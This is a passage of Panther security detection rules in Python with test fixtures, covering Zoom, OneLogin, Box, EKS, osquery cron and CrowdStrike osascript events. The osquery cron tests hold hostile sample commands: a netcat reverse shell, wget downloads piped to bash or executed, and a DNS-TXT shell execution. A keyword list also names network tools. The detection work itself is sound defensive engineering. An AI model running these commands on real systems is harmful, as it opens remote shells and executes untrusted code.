                event.get("requestUrl", "").startswith("/access/"),
                any((desc.startswith(prefix) for prefix in self.PREFIXES)),
                "Admin" in desc,
            ]
        )

    def title(self, event):
        user = event.get("loginName", "<NO_USERNAME_FOUND>")
        ip_addr = event.get("clientIp", "<NO_IP_FOUND>")
        desc = event.get("description", "<NO_DESCRIPTION_FOUND>")
        return f"{user} [{ip_addr}] {desc}"

    def severity(self, event):
        if "Super Admin" in event.get("description", ""):
            return "CRITICAL"
        return "HIGH"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_zoom_helpers import get_zoom_usergroup_context as get_context
from pypanther.log_types import PantherLogType

zoom_passcode_disabled_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Meeting Passcode Disabled",
        ExpectedResult=True,
        Log={
            "time": "2021-11-17 00:37:24Z",
            "operator": "homer@panther.io",
            "category_type": "User Group",
            "action": "Update",
            "operation_detail": "Edit Group Springfield  - Personal Meeting ID (PMI) Passcode: from On to Off",
            "p_log_type": "Zoom.Operation",
        },
    ),
    PantherRuleTest(
        Name="Meeting Passcode Enabled",
        ExpectedResult=False,
        Log={
            "time": "2021-11-17 00:37:24Z",
            "operator": "homer@panther.io",
            "category_type": "User Group",
            "action": "Update",
            "operation_detail": "Edit Group Springfield  - Personal Meeting ID (PMI) Passcode: from Off to On",
            "p_log_type": "Zoom.Operation",
        },
    ),
    PantherRuleTest(
        Name="Add User Group",
        ExpectedResult=False,
        Log={
            "time": "2021-11-17 00:37:24Z",
            "operator": "homer@panther.io",
            "category_type": "User Group",
            "action": "Add",
            "operation_detail": "Add Group Engineers",
            "p_log_type": "Zoom.Operation",
        },
    ),
]


class ZoomPasscodeDisabled(PantherRule):
    RuleID = "Zoom.PasscodeDisabled-prototype"
    DisplayName = "Zoom Meeting Passcode Disabled"
    LogTypes = [PantherLogType.Zoom_Operation]
    Tags = ["Zoom", "Collection:Video Capture"]
    Severity = PantherSeverity.Low
    Description = "Meeting passcode requirement has been disabled from usergroup\n"
    Reports = {"MITRE ATT&CK": ["TA0009:T1125"]}
    Reference = (
        "https://support.zoom.us/hc/en-us/articles/360033559832-Zoom-Meeting-and-Webinar-passcodes"
    )
    Runbook = "Follow up with user or Zoom admin to ensure this meeting room's use case does not allow a passcode.\n"
    SummaryAttributes = ["p_any_emails"]
    Tests = zoom_passcode_disabled_tests

    def rule(self, event):
        if event.get("category_type") != "User Group":
            return False
        context = get_context(event)
        changed = "Passcode" in context.get("Change", "")
        disabled = context.get("DisabledSetting", False)
        return changed and disabled

    def title(self, event):
        context = get_context(event)
        return (
            f"Group {context['GroupName']} passcode requirement disabled by {event.get('operator')}"
        )



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

one_login_threshold_accounts_modified_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Normal User Activated Event",
        ExpectedResult=False,
        Log={
            "event_type_id": "16",
            "actor_user_id": 654321,
            "actor_user_name": "Mountain Lion",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
    PantherRuleTest(
        Name="User Password Changed Event",
        ExpectedResult=True,
        Log={
            "event_type_id": "11",
            "actor_user_id": 654321,
            "actor_user_name": "Mountain Lion",
            "user_id": 123456,
            "user_name": "Bob Cat",
        },
    ),
]


class OneLoginThresholdAccountsModified(PantherRule):
    RuleID = "OneLogin.ThresholdAccountsModified-prototype"
    DisplayName = "OneLogin Multiple Accounts Modified"
    LogTypes = [PantherLogType.OneLogin_Events]
    Tags = ["OneLogin", "Impact:Account Access Removal"]
    Severity = PantherSeverity.Medium
    Reports = {"MITRE ATT&CK": ["TA0040:T1531"]}
    Description = "Possible Denial of Service detected. Threshold for user account password changes exceeded.\n"
    Threshold = 10
    DedupPeriodMinutes = 10
    Reference = "https://en.wikipedia.org/wiki/Denial-of-service_attack"
    Runbook = "Determine if this is normal user-cleanup activity."
    SummaryAttributes = ["account_id", "user_name", "user_id"]
    Tests = one_login_threshold_accounts_modified_tests

    def rule(self, event):
        # filter events; event type 11 is an actor_user changed user password
        return str(event.get("event_type_id")) == "11"

    def title(self, event):
        return f"User [{event.get('actor_user_name', '<UNKNOWN_USER>')}] has exceeded the user account password change threshold"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import box_parse_additional_details, deep_get
from pypanther.log_types import PantherLogType

box_malicious_content_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Regular Event",
        ExpectedResult=False,
        Log={
            "type": "event",
            "additional_details": '{"key": "value"}',
            "created_by": {
                "id": "12345678",
                "type": "user",
                "login": "cat@example",
                "name": "Bob Cat",
            },
            "event_type": "DELETE",
        },
    ),
    PantherRuleTest(
        Name="File marked malicious",
        ExpectedResult=True,
        Log={
            "type": "event",
            "additional_details": '{"key": "value"}',
            "created_by": {
                "id": "12345678",
                "type": "user",
                "login": "cat@example",
                "name": "Bob Cat",
            },
            "event_type": "FILE_MARKED_MALICIOUS",
            "source": {
                "item_id": "123456789012",
                "item_name": "bad_file.pdf",
                "item_type": "file",
                "owned_by": {
                    "id": "12345678",
                    "type": "user",
                    "login": "cat@example",
                    "name": "Bob",
                },
                "parent": {
                    "id": "12345",
                    "type": "folder",
                    "etag": "1",
                    "name": "Parent_Folder",
                    "sequence_id": "2",
                },
            },
        },
    ),
    PantherRuleTest(
        Name="Malicious Content",
        ExpectedResult=True,
        Log={
            "type": "event",
            "additional_details": '{"shield_alert":{"rule_category":"Malicious Content","risk_score":100,"alert_summary":{"upload_activity":{"item_name":"malware.exe"}},"user":{"email":"cat@example"}}}',
            "created_by": {
                "id": 12345678,
                "type": "user",
                "login": "bob@example",
                "name": "Bob Cat",
            },
            "event_type": "SHIELD_ALERT",
            "source": {"id": 12345678, "type": "user", "login": "bob@example"},
        },
    ),
]


class BoxMaliciousContent(PantherRule):
    RuleID = "Box.Malicious.Content-prototype"
    DisplayName = "Malicious Content Detected"
    LogTypes = [PantherLogType.Box_Event]
    Tags = ["Box", "Execution:User Execution"]
    Reports = {"MITRE ATT&CK": ["TA0002:T1204"]}
    Severity = PantherSeverity.High
    Description = "Box has detect malicious content, such as a virus.\n"
    Reference = "https://developer.box.com/guides/events/shield-alert-events/\n"
    Runbook = "Investigate whether this is a false positive or if the virus needs to be contained appropriately.\n"
    SummaryAttributes = ["event_type"]
    Tests = box_malicious_content_tests

    def rule(self, event):
        # enterprise  malicious file alert event
        if event.get("event_type") == "FILE_MARKED_MALICIOUS":
            return True
        # Box Shield will also alert on malicious content
        if event.get("event_type") != "SHIELD_ALERT":
            return False
        alert_details = box_parse_additional_details(event).get("shield_alert", {})
        if alert_details.get("rule_category", "") == "Malicious Content":
            if alert_details.get("risk_score", 0) > 50:
                return True
        return False

    def title(self, event):
        if event.get("event_type") == "FILE_MARKED_MALICIOUS":
            return f"File [{deep_get(event, 'source', 'item_name', default='<UNKNOWN_FILE>')}], owned by [{deep_get(event, 'source', 'owned_by', 'login', default='<UNKNOWN_USER>')}], was marked malicious."
        alert_details = box_parse_additional_details(event).get("shield_alert", {})
        #  pylint: disable=line-too-long
        return f"File [{deep_get(alert_details, 'user', 'email', default='<UNKNOWN_USER>')}], owned by [{deep_get(alert_details, 'alert_summary', 'upload_activity', 'item_name', default='<UNKNOWN_FILE>')}], was marked malicious."



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.log_types import PantherLogType

zoom_two_factor_authentication_disabled_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="2FA Disabled",
        ExpectedResult=True,
        Log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Security  - Sign in with Two-Factor Authentication: from On to Off",
            "operator": "example@example.io",
            "time": "2022-12-16 18:20:35",
        },
    ),
    PantherRuleTest(
        Name="2FA Enabled",
        ExpectedResult=False,
        Log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Security  - Sign in with Two-Factor Authentication: from Off to On",
            "operator": "example@example.io",
            "time": "2022-12-16 18:20:35",
        },
    ),
    PantherRuleTest(
        Name="Sign In Apple ID ",
        ExpectedResult=False,
        Log={
            "action": "Update",
            "category_type": "Account",
            "operation_detail": "Sign-in Methods  - Allow users to sign in with Apple ID: from Off to On",
            "operator": "example@example.io",
            "time": "2022-12-16 18:19:57",
        },
    ),
]


class ZoomTwoFactorAuthenticationDisabled(PantherRule):
    Description = "A Zoom User disabled your organization's setting to sign in with Two-Factor Authentication."
    DisplayName = "Zoom Two Factor Authentication Disabled"
    Runbook = "Confirm this user acted with valid business intent and determine whether this activity was authorized."
    Reference = "https://support.zoom.com/hc/en/article?id=zm_kb&sysparm_article=KB0066054"
    Severity = PantherSeverity.Medium
    LogTypes = [PantherLogType.Zoom_Operation]
    RuleID = "Zoom.Two.Factor.Authentication.Disabled-prototype"
    Tests = zoom_two_factor_authentication_disabled_tests

    def rule(self, event):
        operation_detail = event.get("operation_detail", "<NO_OPS_DETAIL>")
        operation_flag = "Security  - Sign in with Two-Factor Authentication: from On to Off"
        return all(
            [
                event.get("action", "<NO_ACTION>") == "Update",
                event.get("category_type", "<NO_CATEGORY_TYPE>") == "Account",
                operation_detail == operation_flag,
            ]
        )

    def title(self, event):
        return f"Zoom User [{event.get('operator', '<NO_OPERATOR>')}] disabled your organization's setting to sign in with Two-Factor Authentication."



from typing import List

from pypanther.base import PantherDataModel, PantherDataModelMapping
from pypanther.log_types import PantherLogType


class StandardAmazonEKSAudit(PantherDataModel):
    DataModelID: str = "Standard.Amazon.EKS.Audit"
    DisplayName: str = "AWS EKS Audit"
    Enabled: bool = True
    LogTypes: List[str] = [PantherLogType.Amazon_EKS_Audit]
    Mappings: List[PantherDataModelMapping] = [
        PantherDataModelMapping(Name="annotations", Path="$.annotations"),
        PantherDataModelMapping(Name="apiGroup", Path="$.objectRef.apiGroup"),
        PantherDataModelMapping(Name="apiVersion", Path="$.objectRef.apiVersion"),
        PantherDataModelMapping(Name="namespace", Path="$.objectRef.namespace"),
        PantherDataModelMapping(Name="resource", Path="$.objectRef.resource"),
        PantherDataModelMapping(Name="name", Path="$.objectRef.name"),
        PantherDataModelMapping(Name="requestURI", Path="$.requestURI"),
        PantherDataModelMapping(Name="responseStatus", Path="$.responseStatus"),
        PantherDataModelMapping(Name="sourceIPs", Path="$.sourceIPs"),
        PantherDataModelMapping(Name="username", Path="$.user.username"),
        PantherDataModelMapping(Name="userAgent", Path="$.userAgent"),
        PantherDataModelMapping(Name="verb", Path="$.verb"),
        PantherDataModelMapping(Name="requestObject", Path="$.requestObject"),
        PantherDataModelMapping(Name="responseObject", Path="$.responseObject"),
    ]



import shlex
from fnmatch import fnmatch
from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import deep_get
from pypanther.log_types import PantherLogType

osquery_suspicious_cron_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Netcat Listener",
        ExpectedResult=True,
        Log={
            "name": "pack_incident-response_crontab",
            "hostIdentifier": "test-host",
            "action": "added",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "nc -e /bin/bash 237.233.242.58 80",
                "path": "/etc/crontab",
            },
        },
    ),
    PantherRuleTest(
        Name="Wget Pipe Bash",
        ExpectedResult=True,
        Log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "wget -qO- -U- https://sd9fd8f9d8fe.io/i.sh|bash >/dev/null 2>&1",
                "path": "/etc/crontab",
            },
        },
    ),
    PantherRuleTest(
        Name="Wget Execute",
        ExpectedResult=True,
        Log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "wget -O /tmp/load.sh http://test[.]io/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log",
                "path": "/etc/crontab",
            },
        },
    ),
    PantherRuleTest(
        Name="Dig",
        ExpectedResult=True,
        Log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": '/bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"',
                "path": "/etc/crontab",
            },
        },
    ),
    PantherRuleTest(
        Name="Built-in Cron",
        ExpectedResult=False,
        Log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "root cd / && run-parts --report /etc/cron.hourly",
                "path": "/etc/crontab",
            },
        },
    ),
    PantherRuleTest(
        Name="Command with quotes",
        ExpectedResult=False,
        Log={
            "name": "pack_incident-response_crontab",
            "action": "added",
            "hostIdentifier": "test-host",
            "columns": {
                "event": "",
                "minute": "17",
                "hour": "*",
                "day_of_month": "*",
                "month": "*",
                "day_of_week": "7",
                "command": "runit 'go fast'",
                "path": "/etc/crontab",
            },
        },
    ),
]


class OsquerySuspiciousCron(PantherRule):
    RuleID = "Osquery.SuspiciousCron-prototype"
    DisplayName = "Suspicious cron detected"
    LogTypes = [PantherLogType.Osquery_Differential]
    Tags = ["Osquery", "Execution:Scheduled Task/Job"]
    Reports = {"MITRE ATT&CK": ["TA0002:T1053"]}
    Severity = PantherSeverity.High
    Description = "A suspicious cron has been added"
    Runbook = "Analyze the command to ensure no nefarious activity is occurring"
    Reference = "https://en.wikipedia.org/wiki/Cron"
    SummaryAttributes = ["action", "hostIdentifier", "name"]
    Tests = osquery_suspicious_cron_tests
    # Running in unexpected locations
    # nosec
    # Reaching out to the internet
    SUSPICIOUS_CRON_CMD_ARGS = {"/tmp/*", "curl", "dig", "http?://*", "nc", "wget"}
    # Passing arguments into /bin/sh
    SUSPICIOUS_CRON_CMDS = {"*|*sh", "*sh -c *"}

    def suspicious_cmd_pairs(self, command):
        return any((fnmatch(command, c) for c in self.SUSPICIOUS_CRON_CMDS))

    def suspicious_cmd_args(self, command):
        command_args = shlex.split(command.replace("'", "\\'"))  # escape single quotes
        for cmd in command_args:
            if any((fnmatch(cmd, c) for c in self.SUSPICIOUS_CRON_CMD_ARGS)):
                return True
        return False

    def rule(self, event):
        if "crontab" not in event.get("name"):
            return False
        command = deep_get(event, "columns", "command")
        if not command:
            return False
        return any([self.suspicious_cmd_args(command), self.suspicious_cmd_pairs(command)])

    def title(self, event):
        return f"Suspicious cron found on [{event.get('hostIdentifier', '<UNKNOWN_HOST>')}]"



from typing import List

from pypanther.base import PantherRule, PantherRuleTest, PantherSeverity
from pypanther.helpers.panther_base_helpers import crowdstrike_process_alert_context, deep_get
from pypanther.log_types import PantherLogType

crowdstrike_macos_osascript_administrator_tests: List[PantherRuleTest] = [
    PantherRuleTest(
        Name="Ran Osascript with administrator privileges",
        ExpectedResult=True,
        Log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": [
                "1234abcdefghijklmnop",
                "5a29b1ee210395604829dafd744a8039",
                "abcde098654321xyz",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": [
                "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"
            ],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    PantherRuleTest(
        Name="Ran Osascript without administrator privileges",
        ExpectedResult=False,
        Log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": [
                "1234abcdefghijklmnop",
                "5a29b1ee210395604829dafd744a8039",
                "abcde098654321xyz",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": [
                "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"
            ],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    PantherRuleTest(
        Name="Windows",
        ExpectedResult=False,
        Log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Win",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": [
                "1234abcdefghijklmnop",
                "5a29b1ee210395604829dafd744a8039",
                "abcde098654321xyz",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": [
                "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"
            ],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    PantherRuleTest(
        Name="Ran Osacompile with administrator privileges",
        ExpectedResult=False,
        Log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osacompile test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osacompile",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": [
                "1234abcdefghijklmnop",
                "5a29b1ee210395604829dafd744a8039",
                "abcde098654321xyz",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": [
                "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"
            ],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    PantherRuleTest(
        Name="Non Process event",
        ExpectedResult=False,
        Log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "DnsRequest",
            "fdr_event_type": "DnsRequest",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": [
                "1234abcdefghijklmnop",
                "5a29b1ee210395604829dafd744a8039",
                "abcde098654321xyz",
            ],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": [
                "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"
            ],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
]


class CrowdstrikeMacosOsascriptAdministrator(PantherRule):
    DisplayName = "CrowdStrike MacOS Osascript as Administrator"
    Description = "Detects usage of osascript with administrator privileges"
    RuleID = "Crowdstrike.Macos.Osascript.Administrator-prototype"
    Reference = (
        "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/"
    )
    Severity = PantherSeverity.Medium
    LogTypes = [PantherLogType.Crowdstrike_FDREvent]
    Tests = crowdstrike_macos_osascript_administrator_tests

    def rule(self, event):
        event_platform = deep_get(event, "event_platform", default="<UNKNOWN_PLATFORM>")
        event_simplename = deep_get(event, "event_simplename", default="<UNKNOWN_EVENT_SIMPLENAME>")
        image_filename = deep_get(
